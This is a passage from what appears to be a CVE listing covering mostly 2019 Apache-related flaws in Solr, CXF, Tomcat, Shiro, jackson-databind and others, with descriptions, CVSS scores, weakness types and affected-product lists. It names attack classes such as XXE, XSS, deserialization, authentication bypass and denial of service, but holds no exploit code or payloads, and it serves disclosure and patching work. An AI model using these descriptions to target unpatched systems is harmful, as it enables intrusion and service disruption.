oracle weblogic_server 12.2.1.4.0
redhat jboss_enterprise_application_platform 7.2
CVE-2019-12401 MEDIUM

Solr versions 1.3.0 to 1.4.1, 3.1.0 to 3.6.2 and 4.0.0 to 4.10.4 are vulnerable to an XML resource consumption attack (a.k.a. Lol Bomb) via it’s update handler.?By leveraging XML DOCTYPE and ENTITY type elements, the attacker can create a pattern that will expand when the server parses the XML causing OOMs.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-776,

Products Affected

Vendor Product Version
apache solr *
CVE-2019-12402 MEDIUM

The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-835,

Products Affected

Vendor Product Version
oracle communications_session_route_manager *
oracle banking_platform 2.7.0
oracle primavera_gateway 19.12.0
oracle essbase 21.2
oracle retail_xstore_point_of_service 17.0
apache commons_compress *
oracle customer_management_and_segmentation_foundation 18.0
oracle communications_session_report_manager *
oracle flexcube_investor_servicing 12.3.0
oracle primavera_gateway *
oracle flexcube_investor_servicing 12.4.0
oracle retail_xstore_point_of_service 18.0
oracle retail_xstore_point_of_service 16.0
oracle retail_xstore_point_of_service 15.0
oracle communications_ip_service_activator 7.3.0
oracle flexcube_private_banking 12.0.0
oracle communications_element_manager *
oracle banking_payments *
oracle hyperion_infrastructure_technology 11.1.2.4
oracle webcenter_portal 12.2.1.3.0
oracle peoplesoft_enterprise_pt_peopletools 8.57
oracle webcenter_portal 12.2.1.4.0
oracle peoplesoft_enterprise_pt_peopletools 8.58
oracle flexcube_investor_servicing 12.1.0
oracle flexcube_investor_servicing 14.1.0
oracle retail_integration_bus 15.0
oracle peoplesoft_enterprise_pt_peopletools 8.56
fedoraproject fedora 31
oracle banking_platform 2.8.0
fedoraproject fedora 30
oracle banking_platform 2.9.0
oracle communications_ip_service_activator 7.4.0
oracle retail_xstore_point_of_service 19.0
oracle flexcube_investor_servicing 14.0.0
oracle banking_platform 2.6.2
oracle flexcube_private_banking 12.1.0
oracle retail_integration_bus 16.0
oracle jdeveloper 12.2.1.4.0
CVE-2019-12404 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to InfoContent.jsp, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-12405 MEDIUM

Improper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache traffic_control 3.0.0
apache traffic_control 3.0.1
CVE-2019-12406 MEDIUM

Apache CXF before 3.3.4 and 3.2.11 does not restrict the number of message attachments present in a given message. This leaves open the possibility of a denial of service type attack, where a malicious user crafts a message containing a very large number of message attachments. From the 3.3.4 and 3.2.11 releases, a default limit of 50 message attachments is enforced. This is configurable via the message property "attachment-max-count".

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 2.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
oracle commerce_guided_search 11.3.2
apache cxf *
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-12407 MEDIUM

On Apache JSPWiki, up to version 2.11.0.M4, a carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the remember parameter on some of the JSPs, which could allow the attacker to execute javascript in the victim's browser and get some sensitive information about the victim.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache jspwiki *
apache jspwiki 2.11.0
CVE-2019-12408 MEDIUM

It was discovered that the C++ implementation (which underlies the R, Python and Ruby implementations) of Apache Arrow 0.14.0 to 0.14.1 had a uninitialized memory bug when building arrays with null values in some cases. This can lead to uninitialized memory being unintentionally shared if Arrow Arrays are transmitted over the wire (for instance with Flight) or persisted in the streaming IPC and file formats.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-909,

Products Affected

Vendor Product Version
apache arrow *
CVE-2019-12409 HIGH

The 8.1.1 and 8.2.0 releases of Apache Solr contain an insecure setting for the ENABLE_REMOTE_JMX_OPTS configuration option in the default solr.in.sh configuration file shipping with Solr. If you use the default solr.in.sh file from the affected releases, then JMX monitoring will be enabled and exposed on RMI_PORT (default=18983), without any authentication. If this port is opened for inbound traffic in your firewall, then anyone with network access to your Solr nodes will be able to access JMX, which may in turn allow them to upload malicious code for execution on the Solr server.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-434,

Products Affected

Vendor Product Version
apache solr 8.2.0
apache solr 8.1.1
CVE-2019-12410 MEDIUM

While investigating UBSAN errors in https://github.com/apache/arrow/pull/5365 it was discovered Apache Arrow versions 0.12.0 to 0.14.1, left memory Array data uninitialized when reading RLE null data from parquet. This affected the C++, Python, Ruby and R implementations. The uninitialized memory could potentially be shared if are transmitted over the wire (for instance with Flight) or persisted in the streaming IPC and file formats.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-909,

Products Affected

Vendor Product Version
apache arrow *
CVE-2019-12412 MEDIUM

A flaw in the libapreq2 v2.07 to v2.13 multipart parser can deference a null pointer leading to a process crash. A remote attacker could send a request causing a process crash which could lead to a denial of service attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache libapreq2 *
CVE-2019-12413 MEDIUM

In Apache Incubator Superset before 0.31 user could query database metadata information from a database he has no access to, by using a specially crafted complex query.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache superset *
CVE-2019-12414 MEDIUM

In Apache Incubator Superset before 0.32, a user can view database names that he has no access to on a dropdown list in SQLLab

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache superset *
CVE-2019-12415 LOW

In Apache POI up to 4.1.0, when using the tool XSSFExportToXml to convert user-provided Microsoft Excel documents, a specially crafted document can allow an attacker to read files from the local filesystem or from internal network resources via XML External Entity (XXE) Processing.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-611,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle banking_enterprise_product_manufacturing 2.7.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle banking_platform 2.4.1
oracle insurance_policy_administration_j2ee 11.0.2
oracle enterprise_manager_base_platform 13.3.0.0
oracle retail_predictive_application_server 16.0.3
oracle insurance_policy_administration_j2ee 11.2.0
oracle primavera_unifier *
oracle banking_payments 14.1.0
oracle primavera_gateway 17.12.6
oracle instantis_enterprisetrack 17.3
oracle peoplesoft_enterprise_peopletools 8.57
oracle insurance_rules_palette 11.1.0
oracle retail_clearance_optimization_engine 14.0
oracle banking_platform 2.6.1
oracle primavera_gateway 18.8.8.1
oracle webcenter_portal 12.2.1.3.0
oracle primavera_unifier 18.8
oracle primavera_unifier 16.1
oracle webcenter_portal 12.2.1.4.0
oracle big_data_discovery 1.6
oracle insurance_rules_palette 10.2.0
oracle banking_enterprise_originations 2.7.0
oracle banking_payments 14.0.0
oracle application_testing_suite 13.3.0.1
oracle primavera_unifier 19.12
oracle financial_services_market_risk_measurement_and_management 8.0.6
oracle application_testing_suite 12.5.0.3
oracle banking_platform 2.9.0
oracle webcenter_sites 12.2.1.3.0
oracle banking_enterprise_originations 2.8.0
oracle endeca_information_discovery_studio 3.2.0
oracle banking_platform 2.6.2
oracle enterprise_manager_base_platform 12.1.0.5
oracle banking_platform 2.7.1
oracle flexcube_private_banking 12.1.0
oracle communications_diameter_signaling_router_idih: 8.2.2
oracle webcenter_sites 12.2.1.4.0
oracle banking_platform 2.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle communications_diameter_signaling_router_idih: 8.0.0
oracle instantis_enterprisetrack 17.1
oracle banking_platform 2.6.0
oracle application_testing_suite 13.2.0.1
oracle enterprise_repository 12.1.3.0.0
oracle insurance_rules_palette 11.2.0
oracle primavera_unifier 16.2
oracle peoplesoft_enterprise_peopletools 8.58
oracle banking_enterprise_product_manufacturing 2.8.0
oracle flexcube_private_banking 12.0.0
apache poi *
oracle retail_order_broker 15.0
oracle hyperion_infrastructure_technology 11.1.2.4
oracle retail_predictive_application_server 15.0.3
oracle application_testing_suite 13.1.0.1
oracle retail_order_broker 16.0
oracle insurance_rules_palette 10.2.4
oracle financial_services_market_risk_measurement_and_management 8.0.8
oracle insurance_policy_administration_j2ee 11.1.0
oracle banking_platform 2.5.0
oracle instantis_enterprisetrack 17.2
oracle banking_platform 2.4.0
oracle insurance_rules_palette 11.0.2
oracle jdeveloper 12.2.1.4.0
CVE-2019-12416 MEDIUM

we got reports for 2 injection attacks against the DeltaSpike windowhandler.js. This is only active if a developer selected the ClientSideWindowStrategy which is not the default.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache deltaspike *
CVE-2019-12417 LOW

A malicious admin user could edit the state of objects in the Airflow metadata database to execute arbitrary javascript on certain page views. This also presented a Local File Disclosure vulnerability to any file readable by the webserver process.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 4.8 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N 1.7 2.7

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache airflow *
CVE-2019-12418 MEDIUM

When Apache Tomcat 9.0.0.M1 to 9.0.28, 8.5.0 to 8.5.47, 7.0.0 and 7.0.97 is configured with the JMX Remote Lifecycle Listener, a local attacker without access to the Tomcat process or configuration files is able to manipulate the RMI registry to perform a man-in-the-middle attack to capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and gain complete control over the Tomcat instance.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.0 HIGH CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.0 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat *
canonical ubuntu_linux 16.04
debian debian_linux 9.0
opensuse leap 15.1
oracle workload_manager 18c
debian debian_linux 10.0
oracle workload_manager 19c
netapp oncommand_system_manager *
oracle workload_manager 12.2.0.1
debian debian_linux 8.0
CVE-2019-12419 HIGH

Apache CXF before 3.3.4 and 3.2.11 provides all of the components that are required to build a fully fledged OpenId Connect service. There is a vulnerability in the access token services, where it does not validate that the authenticated principal is equal to that of the supplied clientId parameter in the request. If a malicious client was able to somehow steal an authorization code issued to another client, then they could exploit this vulnerability to obtain an access token for the other client.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-863,

Products Affected

Vendor Product Version
oracle commerce_guided_search 11.3.2
apache cxf *
oracle enterprise_manager_base_platform 13.2.1.0
oracle flexcube_private_banking 12.0.0
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-12420 MEDIUM

In Apache SpamAssassin before 3.4.3, a message can be crafted in a way to use excessive resources. Upgrading to SA 3.4.3 as soon as possible is the recommended fix but details will not be shared publicly.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache spamassassin *
debian debian_linux 9.0
debian debian_linux 10.0
debian debian_linux 8.0
CVE-2019-12421 MEDIUM

When using an authentication mechanism other than PKI, when the user clicks Log Out in NiFi versions 1.0.0 to 1.9.2, NiFi invalidates the authentication token on the client side but not on the server side. This permits the user's client-side token to be used for up to 12 hours after logging out to make API requests to NiFi.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-613,

Products Affected

Vendor Product Version
apache nifi *
CVE-2019-12422 MEDIUM

Apache Shiro before 1.4.2, when using the default "remember me" configuration, cookies could be susceptible to a padding attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache shiro *
CVE-2019-12423 MEDIUM

Apache CXF ships with a OpenId Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifing the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it is also possible to obtain the keys from a JWK keystore file, by setting the configuration parameter "rs.security.keystore.type" to "jwk". For this case all keys are returned in this file "as is", including all private key and secret key credentials. This is an obvious security risk if the user has configured the signature keystore file with private or secret key credentials. From CXF 3.3.5 and 3.2.12, it is mandatory to specify an alias corresponding to the id of the key in the JWK file, and only this key is returned. In addition, any private key information is omitted by default. "oct" keys, which contain secret keys, are not returned at all.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-522,

Products Affected

Vendor Product Version
oracle communications_session_report_manager *
oracle communications_session_route_manager 8.1.1
oracle commerce_guided_search 11.3.2
apache cxf *
oracle communications_session_route_manager 8.2.1
oracle communications_session_route_manager 8.2.0
oracle flexcube_private_banking 12.0.0
oracle communications_diameter_signaling_router *
oracle communications_element_manager *
oracle flexcube_private_banking 12.1.0
oracle retail_order_broker 15.0
CVE-2019-12425 MEDIUM

Apache OFBiz 17.12.01 is vulnerable to Host header injection by accepting arbitrary host

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-74,

Products Affected

Vendor Product Version
apache ofbiz 17.12.01
CVE-2019-12426 MEDIUM

an unauthenticated user could get access to information of some backend screens by invoking setSessionLocale in Apache OFBiz 16.11.01 to 16.11.06

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2019-13990 HIGH

initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,CWE-611,

Products Affected

Vendor Product Version
atlassian jira_service_management 4.21.0
atlassian jira_service_management 5.4.9
atlassian jira_service_management 4.20.18
atlassian jira_service_management 5.4.6
oracle jd_edwards_enterpriseone_orchestrator *
oracle enterprise_manager_ops_center 12.4.0.0
atlassian jira_service_management 5.9.0
oracle apache_batik_mapviewer 19c
oracle retail_central_office 14.1
atlassian jira_service_management 5.4.5
atlassian jira_service_management 4.20.10
oracle primavera_unifier *
atlassian jira_service_management 5.4.2
atlassian jira_service_management 5.6.0
oracle terracotta_quartz_scheduler_mapviewer 19c
oracle apache_batik_mapviewer 18c
oracle retail_returns_management 14.1
atlassian jira_service_management 5.3.0
oracle primavera_unifier 16.1
atlassian jira_service_management 4.20.5
atlassian jira_service_management 5.4.3
atlassian jira_service_management 4.20.6
oracle webcenter_sites 12.2.1.3.0
atlassian jira_service_management 5.2.0
oracle retail_back_office 14.1
oracle retail_integration_bus 16.0
oracle communications_session_route_manager *
atlassian jira_service_management 5.7.0
atlassian jira_service_management 5.3.2
softwareag quartz *
atlassian jira_service_management 4.20.4
oracle customer_management_and_segmentation_foundation 18.0
oracle primavera_unifier 16.2
atlassian jira_service_management 5.4.8
oracle apache_batik_mapviewer 12.2.0.1
apache tomee 7.1.3
oracle flexcube_private_banking 12.0.0
atlassian jira_service_management 4.20.11
atlassian jira_service_management 5.10.0
oracle retail_order_broker 15.0
atlassian jira_service_management 4.20.2
atlassian jira_service_management 4.21.1
atlassian jira_service_management 4.22.4
oracle hyperion_infrastructure_technology 11.1.2.4
atlassian jira_service_management 4.20.15
atlassian jira_service_management 5.7.1
atlassian jira_service_management 5.8.0
atlassian jira_service_management 4.20.24
atlassian jira_service_management 4.20.20
oracle communications_ip_service_activator 7.4.0
oracle documaker *
atlassian jira_service_management 5.0.0
atlassian jira_service_management 4.20.22
oracle banking_enterprise_product_manufacturing 2.7.0
atlassian jira_service_management 4.20.1
atlassian jira_service_management 5.1.0
oracle flexcube_investor_servicing 12.3.0
atlassian jira_service_management 5.2.1
oracle flexcube_investor_servicing 12.4.0
oracle retail_xstore_point_of_service 18.0
oracle retail_xstore_point_of_service 16.0
oracle communications_ip_service_activator 7.3.0
oracle google_guava_mapviewer 19c
atlassian jira_service_management 5.4.7
atlassian jira_service_management 4.20.14
atlassian jira_service_management 4.20.25
atlassian jira_service_management 4.22.3
netapp cloud_secure_agent -
atlassian jira_service_management 4.20.19
oracle primavera_unifier 18.8
oracle retail_order_broker 19.0
atlassian jira_service_management 4.22.2
atlassian jira_service_management 4.22.6
oracle banking_enterprise_originations 2.7.0
oracle flexcube_investor_servicing 14.1.0
atlassian jira_service_management 4.20.9
oracle banking_enterprise_originations 2.8.0
oracle retail_xstore_point_of_service 19.0
oracle terracotta_quartz_scheduler_mapviewer 18c
atlassian jira_service_management 5.4.4
oracle google_guava_mapviewer 12.2.0.1
atlassian jira_service_management 4.20.16
atlassian jira_service_management 4.22.0
oracle flexcube_private_banking 12.1.0
atlassian jira_service_management 4.20.3
oracle webcenter_sites 12.2.1.4.0
atlassian jira_service_management 4.20.0
atlassian jira_service_management 4.20.17
atlassian jira_service_management 4.20.8
oracle retail_xstore_point_of_service 17.0
oracle enterprise_manager_base_platform 13.2.1.0
atlassian jira_service_management 5.1.1
oracle flexcube_investor_servicing 14.4.0
oracle banking_enterprise_product_manufacturing 2.8.0
atlassian jira_service_management 5.5.1
oracle retail_xstore_point_of_service 15.0
atlassian jira_service_management 4.20.12
atlassian jira_service_management 4.20.13
atlassian jira_service_management 5.8.1
atlassian jira_service_management 4.20.21
atlassian jira_service_management 4.22.1
atlassian jira_service_management 5.4.0
oracle banking_payments *
atlassian jira_service_management 5.4.1
atlassian jira_service_management 4.20.7
oracle google_guava_mapviewer 18c
oracle retail_order_broker 16.0
atlassian jira_service_management 5.3.1
oracle flexcube_investor_servicing 12.1.0
oracle fusion_middleware_mapviewer 12.2.1.3.0
netapp active_iq_unified_manager -
oracle retail_integration_bus 15.0
oracle retail_point-of-service 14.1
oracle terracotta_quartz_scheduler_mapviewer 12.2.0.1
atlassian jira_service_management 4.20.23
oracle retail_order_broker 18.0
atlassian jira_service_management 5.3.3
CVE-2019-14439 MEDIUM

A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9.2. This occurs when Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has the logback jar in the classpath.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-502,

Products Affected

Vendor Product Version
oracle retail_customer_management_and_segmentation_foundation 17.0
oracle banking_platform 2.7.0
oracle financial_services_analytical_applications_infrastructure *
oracle banking_platform 2.4.1
redhat jboss_middleware_text-only_advisories 1.0
debian debian_linux 10.0
oracle banking_platform 2.6.0
oracle retail_xstore_point_of_service 17.0
oracle jd_edwards_enterpriseone_orchestrator 9.2
oracle primavera_gateway 15.2
oracle primavera_gateway *
oracle retail_xstore_point_of_service 18.0
oracle communications_diameter_signaling_router 8.2.1
oracle retail_xstore_point_of_service 16.0
oracle retail_xstore_point_of_service 7.1
oracle communications_diameter_signaling_router 8.0.0
oracle retail_xstore_point_of_service 15.0
oracle primavera_gateway 16.2
oracle siebel_engineering_-_installer_&_deployment *
fedoraproject fedora 29
oracle global_lifecycle_management_opatch 13.9.4.2.1
oracle siebel_ui_framework *
oracle banking_platform 2.6.1
debian debian_linux 9.0
oracle primavera_gateway 16.1
oracle communications_diameter_signaling_router 8.1
oracle goldengate_stream_analytics *
fasterxml jackson-databind *
oracle communications_instant_messaging_server 10.0.1.3.0
debian debian_linux 8.0
fedoraproject fedora 30
oracle global_lifecycle_management_opatch *
oracle banking_platform 2.5.0
oracle jd_edwards_enterpriseone_tools 9.2
oracle banking_platform 2.4.0
oracle banking_platform 2.7.1
oracle global_lifecycle_management_opatch 11.2.0.3.23
apache drill 1.16.0
oracle communications_diameter_signaling_router 8.2
oracle primavera_gateway 18.8.0
CVE-2019-14892 HIGH

A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5 and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-200,CWE-502,CWE-502,

Products Affected

Vendor Product Version
redhat jboss_enterprise_application_platform 7.0
redhat openshift_container_platform 4.3
redhat jboss_data_grid 7.0.0
redhat jboss_fuse 7.0.0
redhat jboss_data_grid -
apache geode 1.12.0
redhat process_automation 7.0
fasterxml jackson-databind *
redhat decision_manager 7.0
CVE-2019-15544 MEDIUM

An issue was discovered in the protobuf crate before 2.6.0 for Rust. Attackers can exhaust all memory via Vec::reserve calls.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
rust-protobuf_project rust-protobuf *
apache hbase 2.2.3
CVE-2019-15752 HIGH

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-credential-wincred.exe file in %PROGRAMDATA%\DockerDesktop\version-bin\ as a low-privilege user, and then waiting for an admin or service user to authenticate with Docker, restart Docker, or run 'docker login' to force the command.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-732,CWE-732,

Products Affected

Vendor Product Version
apache geode 1.12.0
docker docker *
CVE-2019-17195 MEDIUM

Connect2id Nimbus JOSE+JWT before v7.9 can throw various uncaught exceptions while parsing a JWT, which could result in an application crash (potential information disclosure) or a potential authentication bypass.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle insurance_policy_administration *
oracle jd_edwards_enterpriseone_tools *
oracle enterprise_manager_base_platform 13.4.0.0
oracle primavera_gateway 19.12.0
oracle jd_edwards_enterpriseone_orchestrator *
apache hadoop 3.2.1
oracle data_integrator 12.2.1.4.0
oracle primavera_gateway *
oracle peoplesoft_enterprise_peopletools 8.58
oracle policy_automation *
oracle communications_pricing_design_center 12.0.0.3.0
oracle communications_cloud_native_core_security_edge_protection_proxy 1.7.0
oracle weblogic_server 12.2.1.4.0
connect2id nimbus_jose+jwt *
oracle solaris_cluster 4.0
oracle weblogic_server 12.2.1.3.0
oracle healthcare_data_repository 8.1.0
CVE-2019-17359 MEDIUM

The ASN.1 parser in Bouncy Castle Crypto (aka BC Java) 1.63 can trigger a large attempted memory allocation, and resultant OutOfMemoryError error, via crafted ASN.1 data. This is fixed in 1.64.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-770,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_hcm_global_payroll_switzerland 9.2
oracle business_process_management_suite 12.2.1.3.0
oracle communications_session_route_manager *
bouncycastle bc-java 1.63
netapp active_iq_unified_manager *
oracle retail_xstore_point_of_service 18.0.1
oracle financial_services_analytical_applications_infrastructure *
oracle webcenter_portal 11.1.1.9.0
netapp service_level_manager -
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
oracle data_integrator 12.2.1.4.0
oracle peoplesoft_enterprise_peopletools 8.58
oracle hospitality_guest_access 4.2.0
oracle flexcube_private_banking 12.0.0
oracle weblogic_server 12.2.1.4.0
oracle weblogic_server 12.2.1.3.0
oracle peoplesoft_enterprise_peopletools 8.57
netapp oncommand_api_services -
oracle webcenter_portal 12.2.1.3.0
apache tomee 8.0.1
oracle webcenter_portal 12.2.1.4.0
oracle soa_suite 12.2.1.3.0
bouncycastle legion-of-the-bouncy-castle-java-crytography-api 1.63
oracle business_process_management_suite 12.2.1.4.0
oracle communications_convergence *
oracle peoplesoft_enterprise_peopletools 8.56
oracle managed_file_transfer 12.2.1.3.0
oracle soa_suite 12.2.1.4.0
apache tomee 7.0.7
apache tomee 7.1.2
netapp oncommand_workflow_automation -
oracle flexcube_private_banking 12.1.0
CVE-2019-17554 MEDIUM

The XML content type entity deserializer in Apache Olingo versions 4.0.0 to 4.6.0 is not configured to deny the resolution of external entities. Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache olingo *
CVE-2019-17555 MEDIUM

The AsyncResponseWrapperImpl class in Apache Olingo versions 4.0.0 to 4.6.0 reads the Retry-After header and passes it to the Thread.sleep() method without any check. If a malicious server returns a huge value in the header, then it can help to implement a DoS attack.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
